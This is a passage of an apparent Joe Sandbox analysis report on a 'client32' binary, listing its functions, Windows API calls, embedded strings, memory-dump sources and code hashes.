                                                                                                                                                                                                    • API ID: ColorInitialize$CriticalSection$AtomGlobal$CreateCurrentEnterEventIncrementInterlockedThread
                                                                                                                                                                                                    • String ID: NSMCobrowse
                                                                                                                                                                                                    • API String ID: 2361268844-2243205248
                                                                                                                                                                                                    • Opcode ID: 480f82f715d3db037f59bf22d8cff68ac2f134bddf303eff0ed238e57d294aba
                                                                                                                                                                                                    • Instruction ID: 226d89ac1b4541342643fefbc1fc1e817936d527e4f01f79d48319a6218e5bfa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 480f82f715d3db037f59bf22d8cff68ac2f134bddf303eff0ed238e57d294aba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92513778904B85DFD720CFA9C59479EFBE4BF18308F5089ADD4AA93241DB747604CB62
                                                                                                                                                                                                    Function 11009220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11009295
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 110092E6
                                                                                                                                                                                                      • Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 2168136238-2556327735
                                                                                                                                                                                                    • Opcode ID: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
                                                                                                                                                                                                    • Instruction ID: be305049c21c6d802d82ad86ff43ec2f0153ea4b5fc4fe3555ff5b1edb8d11a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A31DB32F046109BF720DD9CE88095AF7EDEFA57A4B20462FE58AC7740EB719C4487A0
                                                                                                                                                                                                    Function 110394A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _strtok.LIBCMT ref: 110394CC
                                                                                                                                                                                                      • Part of subcall function 1115F7E6: __getptd.LIBCMT ref: 1115F804
                                                                                                                                                                                                    • _strtok.LIBCMT ref: 1103959C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strtok$__getptd
                                                                                                                                                                                                    • String ID: ; >
                                                                                                                                                                                                    • API String ID: 715173073-2207967850
                                                                                                                                                                                                    • Opcode ID: 915faaa10ea82973ce28d20d980d52b504f97a74c46570bc484437df6252f26a
                                                                                                                                                                                                    • Instruction ID: f293b488e698f55d2374b640369896eddf6e6b7a39014645c10a29303e9d1088
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 915faaa10ea82973ce28d20d980d52b504f97a74c46570bc484437df6252f26a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7313B36E1426A6FDB11CFB48C80B9EBBE49F81359F154594DC94AB380F630AD45C7D1
                                                                                                                                                                                                    Function 1101F550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101F664
                                                                                                                                                                                                      • Part of subcall function 1115BD70: SetPropA.USER32(00000000,00000000), ref: 1115BD8E
                                                                                                                                                                                                      • Part of subcall function 1115BD70: SetWindowLongA.USER32(00000000,000000FC,1115B780), ref: 1115BD9F
                                                                                                                                                                                                      • Part of subcall function 1115AC80: SetPropA.USER32(?,?,?), ref: 1115ACD5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Chat Window Destroyed, xrefs: 1101F57B
                                                                                                                                                                                                    • OnDestroy - delete m_WBFrameWnd, xrefs: 1101F62A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Prop$DeleteLongObjectWindow
                                                                                                                                                                                                    • String ID: Chat Window Destroyed$OnDestroy - delete m_WBFrameWnd
                                                                                                                                                                                                    • API String ID: 2163963939-4047192309
                                                                                                                                                                                                    • Opcode ID: f958c79b477abf9a0fea9acb7af46adbfcf8098553b161982d9ac6736f897051
                                                                                                                                                                                                    • Instruction ID: 09d21a9cb39090529c9d6542565f0688f2ad478e5cfbe18cf914d43a02743bba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f958c79b477abf9a0fea9acb7af46adbfcf8098553b161982d9ac6736f897051
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C731E4B5B00701ABE350CF65D880F6FF7A6EF85718F14461DE86A5B390DB75B9008B92
                                                                                                                                                                                                    Function 11143250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00000400,?,00000000,00000000,?,00000401,?,?,?,?), ref: 111432DB
                                                                                                                                                                                                    • wvsprintfA.USER32(?,?,?), ref: 111432F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114330A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatMessagewvsprintf
                                                                                                                                                                                                    • String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
                                                                                                                                                                                                    • API String ID: 65494530-3330918973
                                                                                                                                                                                                    • Opcode ID: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
                                                                                                                                                                                                    • Instruction ID: 325346ff02c3342125f3bb2915ef43e6aa784d2796c19ba5a5be54d08933bc26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA21B6B1D1422DAED710CB94DC81FEFFBBCEB44614F104169EA0993240DB75AA84CBA5
                                                                                                                                                                                                    Function 1100F0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F10B
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F122
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 963545896-2556327735
                                                                                                                                                                                                    • Opcode ID: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
                                                                                                                                                                                                    • Instruction ID: 820ae926dfc744509ffc298ffbf7719e1583de006a97f4842800b066cd7400cd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA11D632B046145BE321DD5CE880BAAF7EDEF966A4F10066FF591CB640CBA1A80593A1
                                                                                                                                                                                                    Function 110633A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,24DE4E77,?,?,00000000,00000000,1117DF28,000000FF,?,1107076F,00000000), ref: 110633FE
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateErrorEventExitLastMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$event
                                                                                                                                                                                                    • API String ID: 3621156866-397488498
                                                                                                                                                                                                    • Opcode ID: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
                                                                                                                                                                                                    • Instruction ID: 1e179fcce89b41eecb28e868e3bc3d371cf40be5e8a1825c7246c0f04d2a5f7d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02115AB5A04715AFD720CF59C841B5AFBE8EB44B14F008A6AF8259B780DBB5A6048B90
                                                                                                                                                                                                    Function 11019140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11019155
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 11019184
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 1785806476-3788999226
                                                                                                                                                                                                    • Opcode ID: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
                                                                                                                                                                                                    • Instruction ID: 308c0151805cc611b22231fe70dd9f684293cd40c739421a1377831650370b76
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E0192B2E012059FD724CE69DC808A7B7E9EB95314715CA2EE59687704EA70F940CB90
                                                                                                                                                                                                    Function 1100B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error. preventing capbuf overflow, xrefs: 1100B5B6
                                                                                                                                                                                                    • Error. NULL capbuf, xrefs: 1100B591
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
